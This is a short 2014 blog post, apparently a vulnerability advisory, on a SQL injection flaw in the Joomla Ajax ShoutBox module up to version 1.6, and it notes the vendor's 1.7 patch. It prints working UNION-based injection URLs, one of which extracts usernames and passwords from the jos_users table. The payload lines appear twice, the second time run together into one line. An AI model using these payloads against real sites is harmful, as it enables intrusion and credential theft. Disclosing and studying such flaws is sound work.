Thursday, 27 March 2014
Labels:
Vulnerability
Joomla Ajax ShoutBox 1.6 And Below Remote SQLi
Joomla Ajax ShoutBox module adds live chat functionality to your Joomla site. Your visitors can chat with each other right in website without refreshing their browsers. It's almost like chatting on an instant messenging network! And it's all powered by AJAX,Recently has been confirmed/reported to its vendor that it has a Remote SQLi vulnerability which will lead your Joomla based website to massive data leakage which includes your admin credentials as well,According to the Author of the exploit Ibrahim Raafat this vulnerability was found 4 Years Ago,File "helper.php" is vulnerable to SQL Injection more briefly parameter "jal_lastID" on line 115,the jal_lastID is requesting details without proper sanitization which led it to a SQLi,
EXAMPLE :
Exploit:
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -Example:?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -While the Vendor showed Rapid Response on it and released a Patch ( 1.7 ) the same day 12 March 2014
Subscribe to:
Post Comments
(
Atom
)
No comments :
Post a Comment